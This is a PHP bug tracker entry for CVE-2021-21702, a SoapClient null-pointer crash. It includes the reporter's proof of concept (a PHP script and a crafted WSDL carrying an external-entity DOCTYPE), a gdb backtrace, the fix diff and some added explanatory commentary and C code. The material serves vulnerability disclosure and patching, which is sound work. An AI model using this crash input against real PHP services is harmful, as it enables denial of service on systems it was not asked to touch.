Sec Bug #80672 Null Dereference in SoapClient
Submitted: 2021-01-26 16:12 UTC Modified: 2021-02-01 08:15 UTC
From: jgalindo at datto dot com Assigned: stas (profile)
Status: Closed Package: SOAP related
PHP Version: 7.4.14 OS: Ubuntu
Private report: No CVE-ID: 2021-21702
 [2021-01-26 16:12 UTC] jgalindo at datto dot com
Description:
------------
PHP will crash with a SIGSEGV whenever an XML is provided to the SoapClient query() function without an existing field.

Version: 
PHP 7.4.11 (cli) (built: Oct  6 2020 10:34:39) ( NTS )
Copyright (c) The PHP Group
Zend Engine v3.4.0, Copyright (c) Zend Technologies
    with Zend OPcache v7.4.11, Copyright (c), by Zend Technologies


Notes:
I did not compile with symbols, but it looks like the issue arises in node_is_equal_ex() when checking the child node name. I tested this using php and python3.

Reproduce steps:
1. Copy xxe.xml to current directory
2. Start python server: python3 -m http.server 80
3. Run crash.php: php crash.php

Test script:
---------------
crash.php:
<?php
// Reporter's test script, with the missing opening PHP tag added so it runs as given.
$credential = array("username", "password");
$soap = new SoapClient("http://localhost/xxe.xml", $credential);
$query = $soap->query(array('sXML' => 'something'));

xxe.xml:
<?xml version="1.0" encoding="ISO-8859-1"?>
<soap:definitions xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xmlns:xsd="http://www.w3.org/2001/XMLSchema"
  xmlns:soap="http://schemas.xmlsoap.org/wsdl/">
<![CDATA[<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://localhost:8080/VULNERABLE"> %xxe;]><foo>l</foo>]]>
</soap:definitions>

Expected result:
----------------
The query would fail gracefully.

Actual result:
--------------
Program received signal SIGSEGV, Segmentation fault.
__strcmp_ssse3 () at ../sysdeps/x86_64/multiarch/../strcmp.S:209
209     ../sysdeps/x86_64/multiarch/../strcmp.S: No such file or directory.
(gdb) bt full
#0  __strcmp_ssse3 () at ../sysdeps/x86_64/multiarch/../strcmp.S:209
No locals.
#1  0x00000000005c9f8a in node_is_equal_ex ()
No symbol table info available.
#2  0x00000000005c25e3 in ?? ()
No symbol table info available.
#3  0x00000000005c2d08 in ?? ()
No symbol table info available.
#4  0x00000000005c4601 in get_sdl ()
No symbol table info available.
#5  0x000000000058ef58 in zim_SoapClient_SoapClient ()
No symbol table info available.
#6  0x00000000006d5f9b in dtrace_execute_internal ()
No symbol table info available.
#7  0x00007ffff5528476 in xdebug_execute_internal (current_execute_data=0x7ffff7fa7660, fci=0x0, return_value_used=0)
    at /build/buildd/xdebug-2.2.3/xdebug-2.2.3/xdebug.c:1551
        edata = <optimized out>
        fse = 0x1213880
        cur_opcode = <optimized out>
        do_return = 0
        function_nr = 1
        restore_error_handler_situation = 1
        tmp_error_cb = <optimized out>
#8  0x0000000000795390 in ?? ()
No symbol table info available.
#9  0x000000000070fcc8 in execute_ex ()
No symbol table info available.
#10 0x00000000006d5e99 in dtrace_execute_ex ()
No symbol table info available.
#11 0x00007ffff5527a7c in xdebug_execute_ex (execute_data=0x7ffff7fa7660) at /build/buildd/xdebug-2.2.3/xdebug-2.2.3/xdebug.c:1437
        op_array = 0x7ffff7fdbc58
        edata = <optimized out>
        dummy = 0xecd608 <compiler_globals+392>
        fse = 0x1213720
        xfse = <optimized out>
        magic_cookie = <optimized out>
        do_return = 0
        function_nr = 0
        le = <optimized out>
        eval_id = <optimized out>
        clear = 1
        return_val = 0x0
#12 0x00000000006e7520 in zend_execute_scripts ()
No symbol table info available.
#13 0x0000000000687d65 in php_execute_script ()
No symbol table info available.
#14 0x000000000079736e in ?? ()
No symbol table info available.
#15 0x00000000004617c0 in main ()
No symbol table info available.
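As an added illustration (not the reporter's code and not PHP's or libxml2's own), a constructed stand-in for the xmlNode fields this report touches: libxml2 leaves name NULL on CDATA section nodes, such as the CDATA block in the reporter's WSDL, so an unguarded strcmp on node->name dereferences NULL; checking the name first makes the node compare unequal instead. The node list and the node names are constructed for the example.

```c
#include <stdio.h>
#include <string.h>
/* Constructed stand-in for the libxml2 xmlNode fields involved; not libxml2 itself. */
typedef enum { ELEMENT_NODE = 1, CDATA_SECTION_NODE = 4 } node_type;
typedef struct node {
    node_type type;
    const char *name;   /* libxml2 leaves this NULL for CDATA nodes */
    struct node *next;  /* next sibling */
} node;

/* Pre-fix shape of ext/soap node_is_equal_ex: strcmp on node->name with no
 * NULL guard, so a CDATA child dereferences NULL (the reported SIGSEGV). */
int node_is_equal_vuln(const node *n, const char *name)
{
    return name == NULL || strcmp(n->name, name) == 0;
}

/* Patched shape: test node->name before strcmp; a nameless node simply
 * compares unequal, which is the graceful failure the reporter expected. */
int node_is_equal_fixed(const node *n, const char *name)
{
    return name == NULL || (n->name && strcmp(n->name, name) == 0);
}

/* Walk a sibling list the way a WSDL loader does and count matching nodes. */
int count_matching(const node *first, const char *name)
{
    int count = 0;
    for (const node *n = first; n != NULL; n = n->next)
        if (node_is_equal_fixed(n, name))
            count++;
    return count;
}

/* Constructed child list: one element child followed by a CDATA block
 * like the one in the reporter's WSDL, whose name is NULL. */
node g_cdata = { CDATA_SECTION_NODE, NULL, NULL };
node g_elem  = { ELEMENT_NODE, "types", &g_cdata };

int count_types_children(void) { return count_matching(&g_elem, "types"); }
int cdata_is_skipped(void)     { return node_is_equal_fixed(&g_cdata, "types") == 0; }

int main(void)
{
    printf("matching 'types' children: %d\n", count_types_children());
    printf("CDATA child skipped safely: %s\n", cdata_is_skipped() ? "yes" : "no");
    return 0;
}
```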


History

 [2021-01-28 12:37 UTC] cmb@php.net
I can confirm the null pointer dereference.  An apparent fix would
be:


 ext/soap/php_xml.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/ext/soap/php_xml.c b/ext/soap/php_xml.c
index b606030179..df376d6027 100644
--- a/ext/soap/php_xml.c
+++ b/ext/soap/php_xml.c
@@ -215,7 +215,7 @@ int attr_is_equal_ex(xmlAttrPtr node, char *name, char *ns)
 
 int node_is_equal_ex(xmlNodePtr node, char *name, char *ns)
 {
-	if (name == NULL || strcmp((char*)node->name, name) == 0) {
+	if (name == NULL || (node->name && strcmp((char*)node->name, name) == 0)) {
 		if (ns) {
 			xmlNsPtr nsPtr = node_find_ns(node);
 			if (nsPtr) {
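Review bot: the added `node->name &&` guard matches the crash frame (strcmp called from node_is_equal_ex), but the hunk header shows the sibling function `attr_is_equal_ex(xmlAttrPtr node, char *name, char *ns)` immediately above; it is worth checking whether that function compares `node->name` with the same unguarded strcmp and needs the same guard. The summary also shows only `ext/soap/php_xml.c` changed (1 insertion, 1 deletion); a regression test that loads a WSDL with a CDATA child, as in the reporter's xxe.xml, would confirm the constructor now fails without a segfault.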


I don't know enough about SOAP to assess whether this is the
proper fix, though.
 [2021-01-28 14:24 UTC] jgalindo at datto dot com
With this being DoS-able, will a CVE be assigned to this?
 [2021-01-29 06:20 UTC] stas@php.net
-CVE-ID: +CVE-ID: 2021-21702
 [2021-01-29 06:20 UTC] stas@php.net
Since it's in SoapClient, looks like needing CVE.
 [2021-01-29 06:22 UTC] stas@php.net
-Assigned To: +Assigned To: stas
 [2021-02-01 08:16 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=3c939e3f69955d087e0bb671868f7267dfb2a502
Log: Fix bug #80672 - Null Dereference in SoapClient
 [2021-02-01 08:16 UTC] stas@php.net
-Status: Assigned +Status: Closed
 [2021-02-01 08:17 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=3c939e3f69955d087e0bb671868f7267dfb2a502
Log: Fix bug #80672 - Null Dereference in SoapClient
 [2021-02-02 19:19 UTC] carusogabriel@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=f733ee195462201b2cbd1d17df2f752ee88771ba
Log: Fix bug #80672 - Null Dereference in SoapClient
 
PHP Copyright © 2001-2021 The PHP Group
All rights reserved.
Last updated: Fri Aug 06 01:01:23 2021 UTC